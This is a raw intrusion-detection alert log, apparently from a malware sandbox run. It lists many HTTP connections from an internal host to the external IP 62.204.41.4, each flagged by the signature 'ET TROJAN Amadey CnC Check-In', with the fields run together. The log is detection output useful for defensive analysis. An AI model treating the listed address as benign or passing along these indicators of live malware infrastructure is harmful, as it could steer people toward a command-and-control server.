                          192.168.2.662.204.41.449773802027700 02/07/23-20:01:04.038338TCP2027700ET TROJAN Amadey CnC Check-In4977380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449913802027700 02/07/23-20:01:42.565044TCP2027700ET TROJAN Amadey CnC Check-In4991380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449974802027700 02/07/23-20:02:00.945242TCP2027700ET TROJAN Amadey CnC Check-In4997480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450241802027700 02/07/23-20:03:17.535341TCP2027700ET TROJAN Amadey CnC Check-In5024180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449876802027700 02/07/23-20:01:33.586090TCP2027700ET TROJAN Amadey CnC Check-In4987680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450143802027700 02/07/23-20:02:53.873531TCP2027700ET TROJAN Amadey CnC Check-In5014380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449720802027700 02/07/23-20:00:51.202653TCP2027700ET TROJAN Amadey CnC Check-In4972080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450045802027700 02/07/23-20:02:22.023470TCP2027700ET TROJAN Amadey CnC Check-In5004580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450397802027700 02/07/23-20:03:58.395001TCP2027700ET TROJAN Amadey CnC Check-In5039780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450037802027700 02/07/23-20:02:20.092570TCP2027700ET TROJAN Amadey CnC Check-In5003780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450233802027700 02/07/23-20:03:15.578132TCP2027700ET TROJAN Amadey CnC Check-In5023380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449781802027700 02/07/23-20:01:05.723794TCP2027700ET TROJAN Amadey CnC Check-In4978180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450392802027700 02/07/23-20:03:57.167562TCP2027700ET TROJAN Amadey CnC Check-In5039280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450434802027700 02/07/23-20:04:07.488023TCP2027700ET TROJAN Amadey CnC Check-In5043480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449868802027700 02/07/23-20:01:31.598757TCP2027700ET TROJAN Amadey CnC Check-In4986880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450196802027700 02/07/23-20:03:06.562601TCP2027700ET TROJAN Amadey CnC Check-In5019680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450238802027700 02/07/23-20:03:16.812392TCP2027700ET TROJAN Amadey CnC Check-In5023880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450406802027700 02/07/23-20:04:00.598596TCP2027700ET TROJAN Amadey CnC Check-In5040680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449740802027700 02/07/23-20:00:56.170997TCP2027700ET TROJAN Amadey CnC Check-In4974080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449810802027700 02/07/23-20:01:15.107347TCP2027700ET TROJAN Amadey CnC Check-In4981080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449851802027700 02/07/23-20:01:24.881497TCP2027700ET TROJAN Amadey CnC Check-In4985180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449946802027700 02/07/23-20:01:54.317743TCP2027700ET TROJAN Amadey CnC Check-In4994680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450311802027700 02/07/23-20:03:37.282022TCP2027700ET TROJAN Amadey CnC Check-In5031180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450274802027700 02/07/23-20:03:28.142137TCP2027700ET TROJAN Amadey CnC Check-In5027480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450470802027700 02/07/23-20:04:16.255518TCP2027700ET TROJAN Amadey CnC Check-In5047080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450020802027700 02/07/23-20:02:15.924236TCP2027700ET TROJAN Amadey CnC Check-In5002080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450078802027700 02/07/23-20:02:33.896004TCP2027700ET TROJAN Amadey CnC Check-In5007880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449905802027700 02/07/23-20:01:40.596381TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450369802027700 02/07/23-20:03:51.539852TCP2027700ET TROJAN Amadey CnC Check-In5036980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450115802027700 02/07/23-20:02:43.638524TCP2027700ET TROJAN Amadey CnC Check-In5011580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450328802027700 02/07/23-20:03:41.453966TCP2027700ET TROJAN Amadey CnC Check-In5032880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450439802027700 02/07/23-20:04:08.690442TCP2027700ET TROJAN Amadey CnC Check-In5043980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450246802027700 02/07/23-20:03:18.721408TCP2027700ET TROJAN Amadey CnC Check-In5024680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449900802027700 02/07/23-20:01:39.360455TCP2027700ET TROJAN Amadey CnC Check-In4990080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450148802027700 02/07/23-20:02:55.124323TCP2027700ET TROJAN Amadey CnC Check-In5014880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449884802027700 02/07/23-20:01:35.347764TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449921802027700 02/07/23-20:01:45.051140TCP2027700ET TROJAN Amadey CnC Check-In4992180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450421802027700 02/07/23-20:04:04.274057TCP2027700ET TROJAN Amadey CnC Check-In5042180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449798802027700 02/07/23-20:01:12.233155TCP2027700ET TROJAN Amadey CnC Check-In4979880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450127802027700 02/07/23-20:02:47.079664TCP2027700ET TROJAN Amadey CnC Check-In5012780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450454802027700 02/07/23-20:04:12.348170TCP2027700ET TROJAN Amadey CnC Check-In5045480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450102802027700 02/07/23-20:02:40.427300TCP2027700ET TROJAN Amadey CnC Check-In5010280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450200802027700 02/07/23-20:03:07.560016TCP2027700ET TROJAN Amadey CnC Check-In5020080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450356802027700 02/07/23-20:03:48.331429TCP2027700ET TROJAN Amadey CnC Check-In5035680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449737802027700 02/07/23-20:00:55.466122TCP2027700ET TROJAN Amadey CnC Check-In4973780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449835802027700 02/07/23-20:01:20.965850TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450163802027700 02/07/23-20:02:58.736661TCP2027700ET TROJAN Amadey CnC Check-In5016380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450418802027700 02/07/23-20:04:03.565176TCP2027700ET TROJAN Amadey CnC Check-In5041880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449918802027700 02/07/23-20:01:43.801204TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450098802027700 02/07/23-20:02:39.366201TCP2027700ET TROJAN Amadey CnC Check-In5009880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450282802027700 02/07/23-20:03:30.132022TCP2027700ET TROJAN Amadey CnC Check-In5028280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450348802027700 02/07/23-20:03:46.349889TCP2027700ET TROJAN Amadey CnC Check-In5034880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449830802027700 02/07/23-20:01:19.753947TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450218802027700 02/07/23-20:03:11.936212TCP2027700ET TROJAN Amadey CnC Check-In5021880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449954802027700 02/07/23-20:01:56.265159TCP2027700ET TROJAN Amadey CnC Check-In4995480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450135802027700 02/07/23-20:02:51.914333TCP2027700ET TROJAN Amadey CnC Check-In5013580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450389802027700 02/07/23-20:03:56.428558TCP2027700ET TROJAN Amadey CnC Check-In5038980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450057802027700 02/07/23-20:02:25.359863TCP2027700ET TROJAN Amadey CnC Check-In5005780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449729802027700 02/07/23-20:00:53.543429TCP2027700ET TROJAN Amadey CnC Check-In4972980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450213802027700 02/07/23-20:03:10.733288TCP2027700ET TROJAN Amadey CnC Check-In5021380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450029802027700 02/07/23-20:02:18.139693TCP2027700ET TROJAN Amadey CnC Check-In5002980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450467802027700 02/07/23-20:04:15.494809TCP2027700ET TROJAN Amadey CnC Check-In5046780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450176802027700 02/07/23-20:03:01.908838TCP2027700ET TROJAN Amadey CnC Check-In5017680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450093802027700 02/07/23-20:02:38.122439TCP2027700ET TROJAN Amadey CnC Check-In5009380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449926802027700 02/07/23-20:01:49.382340TCP2027700ET TROJAN Amadey CnC Check-In4992680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449802802027700 02/07/23-20:01:13.174021TCP2027700ET TROJAN Amadey CnC Check-In4980280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450130802027700 02/07/23-20:02:48.878883TCP2027700ET TROJAN Amadey CnC Check-In5013080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450384802027700 02/07/23-20:03:55.223735TCP2027700ET TROJAN Amadey CnC Check-In5038480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449765802027700 02/07/23-20:01:02.096121TCP2027700ET TROJAN Amadey CnC Check-In4976580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450426802027700 02/07/23-20:04:05.502601TCP2027700ET TROJAN Amadey CnC Check-In5042680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449807802027700 02/07/23-20:01:14.403500TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450000802027700 02/07/23-20:02:10.893167TCP2027700ET TROJAN Amadey CnC Check-In5000080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450254802027700 02/07/23-20:03:20.750307TCP2027700ET TROJAN Amadey CnC Check-In5025480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449848802027700 02/07/23-20:01:24.096025TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449889802027700 02/07/23-20:01:36.602318TCP2027700ET TROJAN Amadey CnC Check-In4988980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450278802027700 02/07/23-20:03:29.144513TCP2027700ET TROJAN Amadey CnC Check-In5027880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450024802027700 02/07/23-20:02:16.923135TCP2027700ET TROJAN Amadey CnC Check-In5002480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449990802027700 02/07/23-20:02:05.389458TCP2027700ET TROJAN Amadey CnC Check-In4999080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450085802027700 02/07/23-20:02:35.926262TCP2027700ET TROJAN Amadey CnC Check-In5008580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450183802027700 02/07/23-20:03:03.375286TCP2027700ET TROJAN Amadey CnC Check-In5018380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450281802027700 02/07/23-20:03:29.880685TCP2027700ET TROJAN Amadey CnC Check-In5028180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450094802027700 02/07/23-20:02:38.377724TCP2027700ET TROJAN Amadey CnC Check-In5009480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450447802027700 02/07/23-20:04:10.628545TCP2027700ET TROJAN Amadey CnC Check-In5044780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450192802027700 02/07/23-20:03:05.567549TCP2027700ET TROJAN Amadey CnC Check-In5019280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450349802027700 02/07/23-20:03:46.609528TCP2027700ET TROJAN Amadey CnC Check-In5034980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450419802027700 02/07/23-20:04:03.800341TCP2027700ET TROJAN Amadey CnC Check-In5041980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450422802027700 02/07/23-20:04:04.527765TCP2027700ET TROJAN Amadey CnC Check-In5042280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449803802027700 02/07/23-20:01:13.424990TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449901802027700 02/07/23-20:01:39.612533TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450324802027700 02/07/23-20:03:40.470050TCP2027700ET TROJAN Amadey CnC Check-In5032480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450189802027700 02/07/23-20:03:04.831775TCP2027700ET TROJAN Amadey CnC Check-In5018980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450413802027700 02/07/23-20:04:02.323273TCP2027700ET TROJAN Amadey CnC Check-In5041380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449959802027700 02/07/23-20:01:57.490225TCP2027700ET TROJAN Amadey CnC Check-In4995980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449793802027700 02/07/23-20:01:11.030637TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450221802027700 02/07/23-20:03:12.688306TCP2027700ET TROJAN Amadey CnC Check-In5022180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449732802027700 02/07/23-20:00:54.261632TCP2027700ET TROJAN Amadey CnC Check-In4973280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449986802027700 02/07/23-20:02:03.914624TCP2027700ET TROJAN Amadey CnC Check-In4998680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450351802027700 02/07/23-20:03:47.097069TCP2027700ET TROJAN Amadey CnC Check-In5035180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450155802027700 02/07/23-20:02:56.813184TCP2027700ET TROJAN Amadey CnC Check-In5015580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450380802027700 02/07/23-20:03:54.222459TCP2027700ET TROJAN Amadey CnC Check-In5038080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449897802027700 02/07/23-20:01:38.564289TCP2027700ET TROJAN Amadey CnC Check-In4989780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449856802027700 02/07/23-20:01:28.475142TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450114802027700 02/07/23-20:02:43.402147TCP2027700ET TROJAN Amadey CnC Check-In5011480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450310802027700 02/07/23-20:03:37.027404TCP2027700ET TROJAN Amadey CnC Check-In5031080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450368802027700 02/07/23-20:03:51.253026TCP2027700ET TROJAN Amadey CnC Check-In5036880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450025802027700 02/07/23-20:02:17.165507TCP2027700ET TROJAN Amadey CnC Check-In5002580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450066802027700 02/07/23-20:02:30.943302TCP2027700ET TROJAN Amadey CnC Check-In5006680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450262802027700 02/07/23-20:03:23.849061TCP2027700ET TROJAN Amadey CnC Check-In5026280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450279802027700 02/07/23-20:03:29.390956TCP2027700ET TROJAN Amadey CnC Check-In5027980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450475802027700 02/07/23-20:04:17.464492TCP2027700ET TROJAN Amadey CnC Check-In5047580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449917802027700 02/07/23-20:01:43.562458TCP2027700ET TROJAN Amadey CnC Check-In4991780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449822802027700 02/07/23-20:01:17.781118TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449958802027700 02/07/23-20:01:57.237616TCP2027700ET TROJAN Amadey CnC Check-In4995880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450209802027700 02/07/23-20:03:09.736543TCP2027700ET TROJAN Amadey CnC Check-In5020980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449828802027700 02/07/23-20:01:19.281463TCP2027700ET TROJAN Amadey CnC Check-In4982880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449733802027700 02/07/23-20:00:54.497423TCP2027700ET TROJAN Amadey CnC Check-In4973380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449863802027700 02/07/23-20:01:30.373662TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450352802027700 02/07/23-20:03:47.357138TCP2027700ET TROJAN Amadey CnC Check-In5035280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449774802027700 02/07/23-20:01:04.281618TCP2027700ET TROJAN Amadey CnC Check-In4977480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449987802027700 02/07/23-20:02:04.169864TCP2027700ET TROJAN Amadey CnC Check-In4998780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450441802027700 02/07/23-20:04:09.174122TCP2027700ET TROJAN Amadey CnC Check-In5044180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449875802027700 02/07/23-20:01:33.341460TCP2027700ET TROJAN Amadey CnC Check-In4987580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450142802027700 02/07/23-20:02:53.636957TCP2027700ET TROJAN Amadey CnC Check-In5014280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449872802027700 02/07/23-20:01:32.599241TCP2027700ET TROJAN Amadey CnC Check-In4987280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449777802027700 02/07/23-20:01:04.763085TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450240802027700 02/07/23-20:03:17.295970TCP2027700ET TROJAN Amadey CnC Check-In5024080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450396802027700 02/07/23-20:03:58.143968TCP2027700ET TROJAN Amadey CnC Check-In5039680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449780802027700 02/07/23-20:01:05.481040TCP2027700ET TROJAN Amadey CnC Check-In4978080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450139802027700 02/07/23-20:02:52.924797TCP2027700ET TROJAN Amadey CnC Check-In5013980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449869802027700 02/07/23-20:01:31.842864TCP2027700ET TROJAN Amadey CnC Check-In4986980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449786802027700 02/07/23-20:01:08.155419TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450323802027700 02/07/23-20:03:40.235917TCP2027700ET TROJAN Amadey CnC Check-In5032380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450151802027700 02/07/23-20:02:55.858238TCP2027700ET TROJAN Amadey CnC Check-In5015180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450225802027700 02/07/23-20:03:13.640810TCP2027700ET TROJAN Amadey CnC Check-In5022580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450479802027700 02/07/23-20:04:18.422959TCP2027700ET TROJAN Amadey CnC Check-In5047980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450053802027700 02/07/23-20:02:24.008849TCP2027700ET TROJAN Amadey CnC Check-In5005380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450136802027700 02/07/23-20:02:52.154928TCP2027700ET TROJAN Amadey CnC Check-In5013680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450234802027700 02/07/23-20:03:15.828144TCP2027700ET TROJAN Amadey CnC Check-In5023480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450081802027700 02/07/23-20:02:34.618171TCP2027700ET TROJAN Amadey CnC Check-In5008180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449933802027700 02/07/23-20:01:51.094138TCP2027700ET TROJAN Amadey CnC Check-In4993380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449749802027700 02/07/23-20:00:58.376848TCP2027700ET TROJAN Amadey CnC Check-In4974980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449942802027700 02/07/23-20:01:53.287894TCP2027700ET TROJAN Amadey CnC Check-In4994280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450463802027700 02/07/23-20:04:14.491803TCP2027700ET TROJAN Amadey CnC Check-In5046380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449847802027700 02/07/23-20:01:23.854308TCP2027700ET TROJAN Amadey CnC Check-In4984780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449844802027700 02/07/23-20:01:23.138925TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449761802027700 02/07/23-20:01:01.073822TCP2027700ET TROJAN Amadey CnC Check-In4976180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450253802027700 02/07/23-20:03:20.519825TCP2027700ET TROJAN Amadey CnC Check-In5025380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449891802027700 02/07/23-20:01:37.097124TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449850802027700 02/07/23-20:01:24.592099TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449888802027700 02/07/23-20:01:36.353710TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450069802027700 02/07/23-20:02:31.730232TCP2027700ET TROJAN Amadey CnC Check-In5006980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449799802027700 02/07/23-20:01:12.467161TCP2027700ET TROJAN Amadey CnC Check-In4979980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449758802027700 02/07/23-20:01:00.586842TCP2027700ET TROJAN Amadey CnC Check-In4975880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450040802027700 02/07/23-20:02:20.818780TCP2027700ET TROJAN Amadey CnC Check-In5004080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450170802027700 02/07/23-20:03:00.433375TCP2027700ET TROJAN Amadey CnC Check-In5017080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450294802027700 02/07/23-20:03:33.100245TCP2027700ET TROJAN Amadey CnC Check-In5029480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450212802027700 02/07/23-20:03:10.483511TCP2027700ET TROJAN Amadey CnC Check-In5021280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450466802027700 02/07/23-20:04:15.238349TCP2027700ET TROJAN Amadey CnC Check-In5046680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450164802027700 02/07/23-20:02:58.984888TCP2027700ET TROJAN Amadey CnC Check-In5016480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450377802027700 02/07/23-20:03:53.490589TCP2027700ET TROJAN Amadey CnC Check-In5037780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450123802027700 02/07/23-20:02:45.637795TCP2027700ET TROJAN Amadey CnC Check-In5012380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450308802027700 02/07/23-20:03:36.533930TCP2027700ET TROJAN Amadey CnC Check-In5030880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450336802027700 02/07/23-20:03:43.422466TCP2027700ET TROJAN Amadey CnC Check-In5033680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450206802027700 02/07/23-20:03:08.986816TCP2027700ET TROJAN Amadey CnC Check-In5020680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450438802027700 02/07/23-20:04:08.447686TCP2027700ET TROJAN Amadey CnC Check-In5043880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449819802027700 02/07/23-20:01:17.050746TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449920802027700 02/07/23-20:01:44.690559TCP2027700ET TROJAN Amadey CnC Check-In4992080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449831802027700 02/07/23-20:01:19.998060TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450450802027700 02/07/23-20:04:11.381589TCP2027700ET TROJAN Amadey CnC Check-In5045080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449961802027700 02/07/23-20:01:57.956540TCP2027700ET TROJAN Amadey CnC Check-In4996180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449914802027700 02/07/23-20:01:42.801957TCP2027700ET TROJAN Amadey CnC Check-In4991480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450116802027700 02/07/23-20:02:43.899561TCP2027700ET TROJAN Amadey CnC Check-In5011680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450468802027700 02/07/23-20:04:15.743631TCP2027700ET TROJAN Amadey CnC Check-In5046880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449849802027700 02/07/23-20:01:24.342359TCP2027700ET TROJAN Amadey CnC Check-In4984980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449754802027700 02/07/23-20:00:59.616651TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450407802027700 02/07/23-20:04:00.848990TCP2027700ET TROJAN Amadey CnC Check-In5040780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449950802027700 02/07/23-20:01:55.313521TCP2027700ET TROJAN Amadey CnC Check-In4995080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450101802027700 02/07/23-20:02:40.156173TCP2027700ET TROJAN Amadey CnC Check-In5010180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450257802027700 02/07/23-20:03:21.461331TCP2027700ET TROJAN Amadey CnC Check-In5025780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450373802027700 02/07/23-20:03:52.533129TCP2027700ET TROJAN Amadey CnC Check-In5037380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450021802027700 02/07/23-20:02:16.175026TCP2027700ET TROJAN Amadey CnC Check-In5002180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450079802027700 02/07/23-20:02:34.128936TCP2027700ET TROJAN Amadey CnC Check-In5007980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449867802027700 02/07/23-20:01:31.342486TCP2027700ET TROJAN Amadey CnC Check-In4986780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450195802027700 02/07/23-20:03:06.319605TCP2027700ET TROJAN Amadey CnC Check-In5019580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449904802027700 02/07/23-20:01:40.346551TCP2027700ET TROJAN Amadey CnC Check-In4990480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450229802027700 02/07/23-20:03:14.593388TCP2027700ET TROJAN Amadey CnC Check-In5022980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450391802027700 02/07/23-20:03:56.919310TCP2027700ET TROJAN Amadey CnC Check-In5039180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449782802027700 02/07/23-20:01:06.291221TCP2027700ET TROJAN Amadey CnC Check-In4978280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450312802027700 02/07/23-20:03:37.521186TCP2027700ET TROJAN Amadey CnC Check-In5031280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449960802027700 02/07/23-20:01:57.722505TCP2027700ET TROJAN Amadey CnC Check-In4996080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449885802027700 02/07/23-20:01:35.593496TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450330802027700 02/07/23-20:03:41.942562TCP2027700ET TROJAN Amadey CnC Check-In5033080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449983802027700 02/07/23-20:02:03.190207TCP2027700ET TROJAN Amadey CnC Check-In4998380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450134802027700 02/07/23-20:02:51.667516TCP2027700ET TROJAN Amadey CnC Check-In5013480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450190802027700 02/07/23-20:03:05.082669TCP2027700ET TROJAN Amadey CnC Check-In5019080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450285802027700 02/07/23-20:03:30.859758TCP2027700ET TROJAN Amadey CnC Check-In5028580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449922802027700 02/07/23-20:01:45.348252TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450126802027700 02/07/23-20:02:46.754869TCP2027700ET TROJAN Amadey CnC Check-In5012680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449726802027700 02/07/23-20:00:52.825969TCP2027700ET TROJAN Amadey CnC Check-In4972680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449839802027700 02/07/23-20:01:21.949196TCP2027700ET TROJAN Amadey CnC Check-In4983980192.168.2.662.204.41.4
